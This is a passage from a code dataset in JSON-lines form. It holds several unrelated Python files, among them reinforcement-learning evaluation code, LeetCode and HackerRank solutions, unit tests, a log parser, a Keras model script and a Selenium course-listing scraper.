range(test_episode):\n observation = env.reset()\n step = 0\n total_reward = 0.0\n\n while True:\n step += 1\n if render:\n env.render()\n\n action = policy(observation)\n observation_next, reward, done, info = env.step(action)\n total_reward += reward\n\n if done or step >= max_step:\n reward_list.append(total_reward)\n break\n # update observation\n observation = observation_next\n\n if plot:\n plt.plot(np.arange(test_episode), reward_list)\n plt.xlabel('Episode')\n plt.ylabel('Episode reward')\n plt.show()\n\n m, s = np.mean(reward_list), np.var(reward_list)\n \n return m, s\n\n\ndef compare_policy(env, policy1, policy2, test_episode=100, max_step=200, render=False, plot=False):\n\n reward_list1 = []\n\n for i_episode in range(test_episode):\n observation = env.reset()\n step = 0\n total_reward = 0.0\n\n while True:\n step += 1\n if render:\n env.render()\n\n action = policy1(observation)\n observation_next, reward, done, info = env.step(action)\n total_reward += reward\n\n if done or step >= max_step:\n reward_list1.append(total_reward)\n\n print(\"Episode: \", i_episode, \" step in this episode:\", step, \" reward: \", total_reward)\n break\n\n # update observation\n observation = observation_next\n\n reward_list2 = []\n for i_episode in range(test_episode):\n observation = env.reset()\n step = 0\n total_reward = 0.0\n\n while True:\n step += 1\n if render:\n env.render()\n\n action = policy2(observation)\n observation_next, reward, done, info = env.step(action)\n total_reward += reward\n\n if done or step >= max_step:\n reward_list2.append(total_reward)\n\n print(\"Episode: \", i_episode, \" step in this episode:\", step, \" reward: \", total_reward)\n break\n\n # update observation\n observation = observation_next\n\n if plot:\n\n plt.subplot(2, 1, 1)\n plt.plot(np.arange(test_episode), reward_list1)\n plt.xlabel('Episode')\n plt.ylabel('Episode Reward for policy 1')\n plt.subplot(2, 1, 2)\n plt.plot(np.arange(test_episode), reward_list2)\n plt.xlabel('Episode')\n plt.ylabel('Episode Reward for policy 2')\n plt.show()\n\n m1, s1, m2, s2 = np.mean(reward_list1), np.var(reward_list1), np.mean(reward_list2), np.var(reward_list2)\n print(\"average reward for first policy: \", m1)\n print(\"variance of reward for first policy: \", s1)\n print(\"average reward for second policy: \", m2)\n print(\"variance of reward for second policy: \", s2)\n\n return m1, s1, m2, s2\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"env_name\", help=\"gym env name: classic control (CartPole-v1, MountainCarContinuous-v0, Pendulum-v0 ... )\")\n parser.add_argument(\"--plot\", dest=\"plot\", action=\"store_true\", help=\"plot two policy performance.\")\n parser.add_argument(\"--test_episode\", dest=\"test_episode\", type=int, help=\"how many test episodes\")\n parser.set_defaults(plot=False, test_episode=100)\n\n args = parser.parse_args()\n\n model_path = './checkpoints/' + args.env_name + '/'\n\n env = gym.make(args.env_name)\n\n # hyperparams\n learning_rate = 0.02\n reward_decay = 0.995\n max_episode = 2\n\n\n if isinstance(env.observation_space, Discrete):\n state_dim = env.observation_space.n\n elif isinstance(env.observation_space, Box):\n state_dim = env.observation_space.shape[0]\n\n if isinstance(env.action_space, Discrete):\n action_choice = env.action_space.n\n action_dim = 1\n discrete_ac = True\n elif isinstance(env.action_space, Box):\n action_dim = env.action_space.shape[0]\n discrete_ac = False\n\n controller = Actor(action_dim=action_dim, state_dim=state_dim, learning_rate=learning_rate, discrete_ac=discrete_ac)\n controller.load_weights(model_path + 'actor.ckpt')\n\n policy1 = controller.take_quick_action\n \n def random_policy(obs):\n return env.action_space.sample()\n policy2 = random_policy\n \n\n m1, s1, m2, s2 = compare_policy(env, policy1, policy2, test_episode=args.test_episode, plot=args.plot)\n\n\n\n\n\n","sub_path":"gppg_model/test_actor.py","file_name":"test_actor.py","file_ext":"py","file_size_in_byte":4808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"593247568","text":"class Solution(object):\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n prod_right = list(nums)\n for i in range(1, len(prod_right)):\n prod_right[i] *= prod_right[i-1]\n prod_left = list(nums)\n for i in range(2, len(prod_left)):\n prod_left[len(prod_left) - i] *= prod_left[len(prod_left) - i + 1]\n \n results = []\n for i in range(len(nums)):\n l = 1 if i == 0 else prod_right[i - 1]\n r = 1 if i == len(nums) - 1 else prod_left[i + 1]\n results.append(l * r)\n return results\n\n","sub_path":"LeetCode/Problems/238 - Product of Array Except Self.py","file_name":"238 - Product of Array Except Self.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"149877085","text":"import numpy as np\nimport pandas as pd\nimport pytest\n\nfrom tests.utils import is_close_to_zero\nfrom vivid.featureset.atoms import StringContainsAtom, AbstractAtom, NotMatchLength, AbstractMergeAtom\nfrom vivid.featureset.utils import create_data_loader\n\n\ndef test_string_contains_atom():\n class TitleContainsAtom(StringContainsAtom):\n queryset = {\n 'title': ['a', 'b'],\n 'place': ['osaka', 'o']\n }\n\n df = pd.DataFrame([\n ['a', 'a', 'b', 'c', 'b'],\n ['tokyo', 'OSaka', 'osaka', None, 'kobe']\n ], index=['title', 'place']).T\n\n df_feat = TitleContainsAtom().generate(df)\n\n assert is_close_to_zero([1, 1, 0, 0, 0], df_feat.values[:, 0])\n assert is_close_to_zero([0, 0, 1, 0, 1], df_feat.values[:, 1])\n\n assert is_close_to_zero([0, 1, 1, 0, 0], df_feat['place_osaka'])\n assert is_close_to_zero([1, 1, 1, 0, 1], df_feat['place_o'])\n\n\nclass TestAbstractAtom:\n\n def test_implementation(self):\n df_input = pd.DataFrame(np.random.uniform(size=(10, 4)))\n\n class Atom1(AbstractAtom):\n use_columns = None\n\n with pytest.raises(NotImplementedError):\n Atom1().generate(df_input)\n\n class Atom2(AbstractAtom):\n use_columns = ('hoge', None,)\n\n with pytest.raises(ValueError):\n Atom2()\n\n class Atom3(AbstractAtom):\n use_columns = ('hogehoge') # not tuple\n\n with pytest.raises(TypeError):\n Atom3()\n\n def test_input_columns(self):\n df_input = pd.DataFrame(np.random.uniform(size=(10, 2)), columns=['foo', 'bar'])\n\n class NotMatchAtom(AbstractAtom):\n use_columns = ('foo', 'bar',)\n\n def transform(self, input_df):\n # return invalid shape datafrme\n return input_df.sample(5)\n\n with pytest.raises(NotMatchLength):\n NotMatchAtom().generate(df_input)\n\n class InvalidColumnAtom(AbstractAtom):\n # not exist input dataframe\n use_columns = ('hoge',)\n\n with pytest.raises(ValueError):\n InvalidColumnAtom().generate(df_input)\n\n\nMERGE_KEY = 'key'\n\n\ndef create_test_df():\n df_master = pd.DataFrame([\n [1, 2],\n [2, 5],\n [3, 10]\n ], columns=[MERGE_KEY, 'col1'])\n return df_master\n\n\ntest_loader = create_data_loader(create_test_df)\n\n\nclass TestMergeAtom:\n def setup_method(self):\n self.df_not_have_key = pd.DataFrame(np.random.uniform(size=(10, 2)), columns=['foo', 'bar'])\n self.df_has_key = pd.DataFrame([\n [1, 2], [1, 2], [1, 2], [1, 2], [2, 2],\n ], columns=[MERGE_KEY, 'hoge'])\n\n def test_invalid_implement(self):\n class InvalidAtom(AbstractMergeAtom):\n pass\n\n with pytest.raises(AttributeError):\n InvalidAtom()\n\n class InvalidAtom2(AbstractMergeAtom):\n merge_key = MERGE_KEY\n\n def generate_outer_feature(self):\n return self.df_outer\n\n with pytest.raises(NotImplementedError):\n InvalidAtom2().generate(self.df_has_key)\n\n def test_basic(self):\n class BasicMergeAtom(AbstractMergeAtom):\n merge_key = MERGE_KEY\n\n def read_outer_dataframe(self):\n return test_loader.read()\n\n def generate_outer_feature(self):\n return self.df_outer\n\n with pytest.raises(ValueError):\n BasicMergeAtom().generate(self.df_not_have_key)\n\n df_out = BasicMergeAtom().generate(self.df_has_key)\n assert df_out.columns.tolist() == ['col1']\n assert df_out.shape == (len(self.df_has_key), 1)\n\n def test_master_loader(self):\n class BasicMergeAtom(AbstractMergeAtom):\n merge_key = MERGE_KEY\n\n def read_outer_dataframe(self):\n return test_loader.read()\n\n def generate_outer_feature(self):\n return self.df_outer\n\n atom = BasicMergeAtom()\n atom.generate(self.df_has_key)\n\n assert atom._master_dataframe is not None\n","sub_path":"tests/test_featureset/test_atoms.py","file_name":"test_atoms.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"432717840","text":"from collections import Counter\n\nfilepath='apache.log'\nmydict = {}\nip_list = []\n#functiondefns\n\ndef createDict(line):\n ipmsg = line.split('\\n')[0].split('- -')\n ip = ipmsg[0]\n ip_list.append(ip);\n action = (ipmsg[1].split('\"')[1]).split('\"')[0]\n if ip not in mydict.keys():\n mydict[ip] = action\n elif ip in mydict.keys():\n mydict[ip] = mydict[ip]+','+action\n #ip = ip.append(ip)\ndef getIPCounter():\n return Counter(ip_list)\ndef countKeys():\n for key, value in mydict.iteritems():\n #print (key, value)\n if ',' in value:\n print(key, len(value.split(',')))\n #continue\n else:\n print(key, 1)\n #continue\n\n\nfor line in open(filepath, 'r+'):\n createDict(line)\n\nipcount = getIPCounter()\ndict_count = countKeys()\n#print mydict\n#print \"ipcount is:\", ipcount\n#print \"dict_count is\", dict_count\n#mydict_len = len(mydict)\n#print \"Total IPs found in log file are:\", ipcount\n#print \"Here are the IPs found in log file\\n\", ip_list\n\n#print \"mydict_len\", mydict_len\n","sub_path":"log-parsing/pyCounter.py","file_name":"pyCounter.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"419359551","text":"'''\nGiven an array of integers, calculate which fraction of its elements \nare positive, which fraction of its elements are negative, \nand which fraction of its elements are zeroes, respectively. \nPrint the decimal value of each fraction on a new line.\n\nOutput Format\n\nYou must print the following 3 lines:\n\nA decimal representing of the fraction of positive numbers in the array compared to its size.\nA decimal representing of the fraction of negative numbers in the array compared to its size.\nA decimal representing of the fraction of zeroes in the array compared to its size.\n\nlink: https://www.hackerrank.com/challenges/plus-minus/problem\n'''\nimport sys\n\ndef plusMinus(arr):\n pos = 0\n neg = 0\n zero = 0\n for num in arr:\n if num > 0:\n pos += 1\n elif num < 0:\n neg += 1\n else:\n zero += 1\n \n print(\"%.6f\" % (pos/float(len(arr))))\n print(\"%.6f\" % (neg/float(len(arr))))\n print(\"%.6f\" % (zero/float(len(arr))))\n\nif __name__ == \"__main__\":\n n = int(raw_input().strip())\n arr = map(int, raw_input().strip().split(' '))\n plusMinus(arr)","sub_path":"hackerrank/Warmup/PlusMinus.py","file_name":"PlusMinus.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"298933604","text":"from execution.abstract.querie import * \nfrom execution.symbol.environment import *\nfrom execution.symbol.table import *\nfrom execution.symbol.column import *\nfrom execution.symbol.typ import *\nfrom storageManager import jsonMode as admin\n\nclass Add_Constraint(Querie):\n ''' \n row = numero de fila\n column = numero de columna\n columnName = espera un nombre de columna debe de ser una cadena\n constraintval = espera un constraint esto seria un dicionario con la siguiente sintaxis:\n [\n {'type': 'primary', 'name':nombre para el constraint(cadena) , 'value': nombre de la columna que es la llave primaria(cadena)},-> si es una llave primaria\n {'type': 'foreign', 'name':nombre para el constraint(cadena), 'value': nombre de la columna que es la llave foranea(cadena), 'references': campo_tabla_extranjera}, -> si es una llave foranea\n {'type': 'not null', 'name':nombre para el constraint(cadena), 'value': nombre de la columna que es nula(cadena)}, -> si es un NOT NULL\n {'type': 'check', 'name':nombre para el constraint(cadena), 'value':objetoExpression -> un ojeto exp ejemplo (5>10)}, -> si es un CHECK\n {'type': 'unique', 'name':nombre para el constraint(cadena),'value': nombre de la columna que va a ser unique(cadena)} si es un UNIQUE\n ]\n {'type': 'primary', 'name':'pk_tabla1' , 'value': 'columna_tabla1'}\n \n '''\n def __init__(self,columnName,constraintVal, row, column):\n Querie.__init__(self, row, column)\n self.columnName = columnName\n self.constraintVal = constraintVal\n\n # constraintVal es un diccionario {'type': 'unique', 'name':nombre,'value': campo_unico}\n def execute(self, environment,tableName):\n if not isinstance(self.columnName,str):\n return {'Error': 'El nombre indicado de la columna no es una cadena.', 'Fila':self.row, 'Columna': self.column }\n if not isinstance(tableName,str):\n return {'Error': 'El nombre indicado de la tabla no es una cadena.', 'Fila':self.row, 'Columna': self.column }\n \n db_name = environment.getActualDataBase()\n database = environment.readDataBase(db_name)\n table = database.getTable(tableName)\n\n repetido = False\n for item in table.constraint:\n if item['name'] == self.constraintVal['name']:\n repetido = True\n break\n if repetido == True:\n return {'Error': 'ya existe una restriccion con el mismo nombre', 'Fila':self.row, 'Columna': self.column }\n \n #columna a la que hace referencia menos el check\n if self.constraintVal['type'] != 'check':\n reference = False\n for item in table.columns:\n if item.name == self.constraintVal['value']:\n reference = True\n break\n if reference == False:\n return {'Error': 'La columna a la que hace referencia la restriccion no existe en la tabla: '+tableName, 'Fila':self.row, 'Columna': self.column }\n \n if self.constraintVal['type'] == 'primary':\n for item in table.constraint:\n if item['value'] == self.constraintVal['value']:\n if item['type'] == 'primary':\n return 'la columna: '+self.columnName +' ya tiene la restriccionde llave primaria'\n result = admin.extractTable(db_name, tableName)\n if isinstance(result,list):\n if len(result) > 0:\n return {'Error': 'No se puede agregar la llave primaria a la tabla: '+tableName+' porque la tabla ya contiene valores.', 'Fila':self.row, 'Columna': self.column }\n for item in table.constraint:\n if item['type'] == 'primary':\n self.constraintVal = {'type':self.constraintVal['type'],'name':item['name'],'value':self.constraintVal['value']}\n table.createConstraint(self.constraintVal)\n\n return 'la restriccion fue insertada en la tabla: '+tableName+' con exito.'\n\n\n\n\n","sub_path":"parser/team27/G-27/execution/querie/add_constraint.py","file_name":"add_constraint.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"470521171","text":"# // Time Complexity : O(n)\n# // Space Complexity : O(1)\n# // Did this code successfully run on Leetcode : Yes\n# // Any problem you faced while coding this : No\n\n# // Your code here along with comments explaining your approach\nclass Solution:\n def minCost(self, costs: List[List[int]]) -> int:\n \n if len(costs)==0:\n return 0\n \n # the values at 0th index don't have an option for choose/don't choose so we start from 1st index; we keep updating the values at the current index by adding the current price of color to the minimum of the other two prices of color at previous index (as two adjacent houses can't be painted with same color)\n\n for i in range(1, len(costs)):\n costs[i][0] += min(costs[i-1][1], costs[i-1][2])\n costs[i][1] += min(costs[i-1][0], costs[i-1][2])\n costs[i][2] += min(costs[i-1][0], costs[i-1][1])\n \n # return the minimum of the calculated value at pur last index\n return min(costs[len(costs)-1][0], min(costs[len(costs)-1][1], costs[len(costs)-1][2]))\n ","sub_path":"paintHouse.py","file_name":"paintHouse.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"579300133","text":"cout = input()\nfor i in range(int(cout)):\n t = input()\n initial = input()\n array = initial.split(\" \")\n character = []\n times = []\n for i in array:\n if i not in character:\n character.append(i)\n times.append(1)\n else:\n times[character.index(i)] += 1\n haveMost = False\n for j in range(len(times)):\n if int(times[j]) > float(t)/2:\n print(character[j])\n haveMost = True\n if not haveMost:\n print(-1)","sub_path":"Code/CodeRecords/2307/60619/234923.py","file_name":"234923.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"587335828","text":"import pandas as pd\nimport numpy as np\nimport os\nimport sys\nimport gzip\n\nfrom keras import backend as K\n\nfrom keras.layers import Input, Dense, Dropout, Activation, Conv1D, MaxPooling1D, Flatten\nfrom keras.optimizers import SGD, Adam, RMSprop\nfrom keras.models import Sequential, Model, model_from_json, model_from_yaml\nfrom keras.utils import np_utils\nfrom keras.callbacks import ModelCheckpoint, CSVLogger, ReduceLROnPlateau\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, MaxAbsScaler\n\nimport sys, os\n#sys.path.append(os.getenv(\"CANDLE\")+'/Candle/common')\n#import candle_keras as candle\nsys.path.append(os.getenv(\"CANDLE\")+'/Benchmarks/common')\nimport candle\n\ndef load_data(train_path, test_path, hyperparams):\n\n print('Loading data...')\n df_train = (pd.read_csv(train_path,header=None).values).astype('float32')\n df_test = (pd.read_csv(test_path,header=None).values).astype('float32')\n print('done')\n\n print('df_train shape:', df_train.shape)\n print('df_test shape:', df_test.shape)\n\n seqlen = df_train.shape[1]\n\n df_y_train = df_train[:,0].astype('int')\n df_y_test = df_test[:,0].astype('int')\n\n Y_train = np_utils.to_categorical(df_y_train,hyperparams['classes'])\n Y_test = np_utils.to_categorical(df_y_test,hyperparams['classes'])\n\n df_x_train = df_train[:, 1:seqlen].astype(np.float32)\n df_x_test = df_test[:, 1:seqlen].astype(np.float32)\n\n# X_train = df_x_train.as_matrix()\n# X_test = df_x_test.as_matrix()\n\n X_train = df_x_train\n X_test = df_x_test\n\n scaler = MaxAbsScaler()\n mat = np.concatenate((X_train, X_test), axis=0)\n mat = scaler.fit_transform(mat)\n\n X_train = mat[:X_train.shape[0], :]\n X_test = mat[X_train.shape[0]:, :]\n\n return X_train, Y_train, X_test, Y_test\n\n\nprint ('Params:', hyperparams)\n\nfile_train = hyperparams['train_data']\nfile_test = hyperparams['test_data']\nurl = hyperparams['data_url']\n\n#train_file = candle.get_file(file_train, url+file_train, cache_subdir='Pilot1')\n#test_file = candle.get_file(file_test, url+file_test, cache_subdir='Pilot1')\ntrain_file = candle.get_file(file_train, url+file_train, datadir=os.getenv(\"CANDLE\")+'/Benchmarks/Data/Pilot1')\ntest_file = candle.get_file(file_test, url+file_test, datadir=os.getenv(\"CANDLE\")+'/Benchmarks/Data/Pilot1')\n\nX_train, Y_train, X_test, Y_test = load_data(train_file, test_file, hyperparams)\n\nprint('X_train shape:', X_train.shape)\nprint('X_test shape:', X_test.shape)\n\nprint('Y_train shape:', Y_train.shape)\nprint('Y_test shape:', Y_test.shape)\n\nx_train_len = X_train.shape[1]\n\n# this reshaping is critical for the Conv1D to work\n\nX_train = np.expand_dims(X_train, axis=2)\nX_test = np.expand_dims(X_test, axis=2)\n\nprint('X_train shape:', X_train.shape)\nprint('X_test shape:', X_test.shape)\n\nmodel = Sequential()\n\nlayer_list = list(range(0, len(hyperparams['conv']), 3))\nfor l, i in enumerate(layer_list):\n filters = hyperparams['conv'][i]\n filter_len = hyperparams['conv'][i+1]\n stride = hyperparams['conv'][i+2]\n print(int(i/3), filters, filter_len, stride)\n if hyperparams['pool']:\n pool_list=hyperparams['pool']\n if type(pool_list) != list:\n pool_list=list(pool_list)\n\n if filters <= 0 or filter_len <= 0 or stride <= 0:\n break\n if 'locally_connected' in hyperparams:\n model.add(LocallyConnected1D(filters, filter_len, strides=stride, padding='valid', input_shape=(x_train_len, 1)))\n else:\n #input layer\n if i == 0:\n model.add(Conv1D(filters=filters, kernel_size=filter_len, strides=stride, padding='valid', input_shape=(x_train_len, 1)))\n else:\n model.add(Conv1D(filters=filters, kernel_size=filter_len, strides=stride, padding='valid'))\n model.add(Activation(hyperparams['activation']))\n if hyperparams['pool']:\n model.add(MaxPooling1D(pool_size=pool_list[int(i/3)]))\n\nmodel.add(Flatten())\n\nfor layer in hyperparams['dense']:\n if layer:\n model.add(Dense(layer))\n model.add(Activation(hyperparams['activation']))\n if hyperparams['drop']:\n model.add(Dropout(hyperparams['drop']))\nmodel.add(Dense(hyperparams['classes']))\nmodel.add(Activation(hyperparams['out_act']))\n\n#Reference case\n#model.add(Conv1D(filters=128, kernel_size=20, strides=1, padding='valid', input_shape=(P, 1)))\n#model.add(Activation('relu'))\n#model.add(MaxPooling1D(pool_size=1))\n#model.add(Conv1D(filters=128, kernel_size=10, strides=1, padding='valid'))\n#model.add(Activation('relu'))\n#model.add(MaxPooling1D(pool_size=10))\n#model.add(Flatten())\n#model.add(Dense(200))\n#model.add(Activation('relu'))\n#model.add(Dropout(0.1))\n#model.add(Dense(20))\n#model.add(Activation('relu'))\n#model.add(Dropout(0.1))\n#model.add(Dense(CLASSES))\n#model.add(Activation('softmax'))\n\nkerasDefaults = candle.keras_default_config()\n\n# Define optimizer\noptimizer = candle.build_optimizer(hyperparams['optimizer'],\n hyperparams['learning_rate'],\n kerasDefaults)\n\nmodel.summary()\nmodel.compile(loss=hyperparams['loss'],\n optimizer=optimizer,\n metrics=[hyperparams['metrics']])\n\noutput_dir = hyperparams['save']\n\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n# calculate trainable and non-trainable params\nhyperparams.update(candle.compute_trainable_params(model))\n\n# set up a bunch of callbacks to do work during model training..\nmodel_name = hyperparams['model_name']\npath = '{}/{}.autosave.model.h5'.format(output_dir, model_name)\n# checkpointer = ModelCheckpoint(filepath=path, verbose=1, save_weights_only=False, save_best_only=True)\ncsv_logger = CSVLogger('{}/training.log'.format(output_dir))\nreduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10, verbose=1, mode='auto', epsilon=0.0001, cooldown=0, min_lr=0)\ncandleRemoteMonitor = candle.CandleRemoteMonitor(params=hyperparams)\ntimeoutMonitor = candle.TerminateOnTimeOut(hyperparams['timeout'])\n\nhistory2 = model.fit(X_train, Y_train,\n batch_size=hyperparams['batch_size'],\n epochs=hyperparams['epochs'],\n verbose=1,\n validation_data=(X_test, Y_test),\n callbacks = [csv_logger, reduce_lr, candleRemoteMonitor, timeoutMonitor])\n\nscore = model.evaluate(X_test, Y_test, verbose=0)\n\nval_to_return = score[0]\n\nprint(model.metrics_names)\nprint(score)\n","sub_path":"templates/examples/bayesian/nt3_baseline_keras2.py","file_name":"nt3_baseline_keras2.py","file_ext":"py","file_size_in_byte":6483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"471522204","text":"# -*- coding: utf-8 -*-\n\n#\n# Copyright (c) 2017-2019 Virtual Cable S.L.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# * Neither the name of Virtual Cable S.L. nor the names of its contributors\n# may be used to endorse or promote products derived from this software\n# without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\n.. moduleauthor:: Adolfo Gómez, dkmaster at dkmon dot com\n\"\"\"\nimport datetime\nimport logging\nimport typing\n\nfrom django.utils.translation import gettext_noop as _\n\nfrom uds.core import jobs\nfrom uds import models\n\nfrom .provider import OGProvider\nfrom .service import OGService\n\n# Not imported at runtime, just for type checking\nif typing.TYPE_CHECKING:\n from uds.core.module import Module\n\nlogger = logging.getLogger(__name__)\n\n\nclass OpenGnsysMaintainer(jobs.Job):\n frecuency = 60 * 60 * 4 # Once every 4 hours\n friendly_name = 'OpenGnsys cache renewal job'\n\n def run(self) -> None:\n logger.debug('Looking for OpenGnsys renewable cache elements')\n\n # Look for Providers of type VMWareVCServiceProvider\n provider: models.Provider\n for provider in models.Provider.objects.filter(\n maintenance_mode=False, data_type=OGProvider.typeType\n ):\n logger.debug('Provider %s is type openGnsys', provider)\n\n # Locate all services inside the provider\n service: models.Service\n for service in provider.services.all():\n instance: OGService = typing.cast(OGService, service.getInstance())\n since = models.getSqlDatetime() - datetime.timedelta(\n hours=instance.maxReservationTime.num() - 8\n ) # If less than 8 hours of reservation...\n # Now mark for removal every CACHED service that is about to expire its reservation on OpenGnsys\n userService: models.UserService\n for userService in models.UserService.objects.filter(\n deployed_service__service=service,\n creation_date__lt=since,\n cache_level=1,\n ):\n logger.info(\n 'The cached user service %s is about to expire. Removing it so it can be recreated',\n userService,\n )\n userService.remove()\n\n logger.debug('OpenGnsys job finished')\n","sub_path":"server/src/uds/services/OpenGnsys/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"543747945","text":"from django.db.models import Q\nfrom django.http import JsonResponse\nfrom rest_framework.decorators import APIView\n\nfrom caravans import models\n\n\nclass UOMAPIView(APIView):\n\n def post(self, request, *args, **kwargs):\n if request.data.get('type') == 'all':\n uom = models.UOM.objects.all()\n\n filter = request.data.get('search', False)\n if filter:\n uoms = uom.filter(\n Q(name=filter)\n )\n else:\n uoms = uom\n\n results = []\n for uom in uoms:\n results.append({\n 'id': uom.id,\n 'name': uom.name\n })\n\n return JsonResponse({'list': results})\n\n return JsonResponse({\n 'data': 'none'\n })\n","sub_path":"nac/caravans/views/uom_api.py","file_name":"uom_api.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"485447535","text":"from bs4 import BeautifulSoup\nimport requests\nfrom tabulate import tabulate\nimport timeit\nfrom selenium import webdriver\nimport time\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.common.by import By\nfrom tqdm import tqdm\nimport pandas as pd\nfrom flask import jsonify\nfrom flask import request\nfrom flask import Flask\nimport json\n# from course_info import Course\n\napp = Flask(__name__)\n\n# browser = webdriver.Chrome()\n@app.route('/new_course', methods=['GET'])\ndef main():\n start = timeit.timeit()\n # browser = webdriver.Chrome()\n profile = webdriver.FirefoxProfile()\n profile.set_preference(\"permissions.default.image\", 2)\n opts = Options()\n opts.set_headless()\n assert opts.headless\n\n browser = webdriver.Firefox(firefox_profile=profile,options=opts)\n\n # chromeOptions = webdriver.ChromeOptions()\n # prefs = {'profile.managed_default_content_settings.images':2}\n # chromeOptions.add_experimental_option(\"prefs\", prefs)\n # browser= webdriver.Chrome('/usr/bin/chromedriver',chrome_options=chromeOptions)\n\n base_url = \"https://www.freetutorials.eu/\"\n\n browser.get(base_url)\n time.sleep(1)\n\n # response = requests.get(url)\n # print(response)\n #\n # soup = BeautifulSoup(response.content,'html.parser')\n # # print(soup.prettify(formatter='minimal'))\n #\n # courses = soup.find(\"div\",{\"class\":\"content-area\"})\n # articles = courses.find_all('article', {'class': 'post-box'})\n body = browser.find_element_by_tag_name(\"body\")\n elem = body.find_element_by_class_name(\"content-area\")\n # articles = elem.find_elements_by_class_name(\"post-box\")\n\n page_down = 20\n\n courses = list()\n\n size = 0\n # pbar = tqdm(total=page_down)\n while page_down:\n\n body.send_keys(Keys.PAGE_DOWN)\n time.sleep(.2)\n page_down -= 1\n articles = elem.find_elements_by_class_name(\"post-box\")\n # print(type(articles))\n\n # print(size)\n for article in articles[size:]:\n # course = Course()\n\n title = article.find_element_by_class_name(\"entry-title\")\n # url = title.get_attribute('href')\n url = title.find_element_by_tag_name(\"a\").get_attribute(\"href\")\n # print(url)\n # find_element(By.XPATH,\"//h2[@class='entry-title']/a\").getAttribute(\"href\")\n upload_date = article.find_element_by_class_name('published').text\n image = article.find_element_by_class_name('attachment-featured').get_attribute('src')\n # url = articles.\n course = {'title':title.text,'url':url,'upload_date':upload_date,'image':image}\n courses.append(course)\n # course.title = title.text\n # titles.append(title.text)\n # urls.append(url)\n # course.url = url\n # course.upload_date = upload_date\n # upload_dates.append(upload_date)\n # course.image = image\n # images.append(image)\n # value = title.get_attribute('href')\n # titles.update({key:value})\n # courses.append(course)\n\n size = len(articles)\n # pbar.update(1)\n\n # pbar.close()\n\n # print(courses)\n # for article in articles:\n # print\n # a = article.find(\"article\",{\"class\":\"post-box\"})\n # header = ['Title','URL']\n # print(tabulate(titles,headers=header))\n\n\n # df = pd.DataFrame({'Title':titles,'Upload dates':upload_dates,'Link':urls,'Thumbnail':images})\n # df.to_csv('new_courses')\n # df.to_json('new_courses.json')\n # print(df)\n # print('Courses saved')\n # print(tabulate(titles))\n end = start - timeit.timeit()\n\n\n # print(\"Webcrawling time ---------------> \",str(end*1000))\n # browser.__exit__()\n # print(titles)\n browser.quit()\n # print(courses)\n return jsonify({'code':200,'data':courses,'time':end*1000})\n\n\n\nif(__name__ == '__main__'):\n app.run(debug=True,port=8443)\n","sub_path":"venv/include/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"338564808","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nimport datetime\nimport time\nimport pdb\nimport os\nimport sys\nimport signal\nimport socket\nimport platform\nfrom o2locktoplib import config\nfrom o2locktoplib import shell\n\nPY2 = (sys.version_info[0] == 2)\nif \"linux\" in 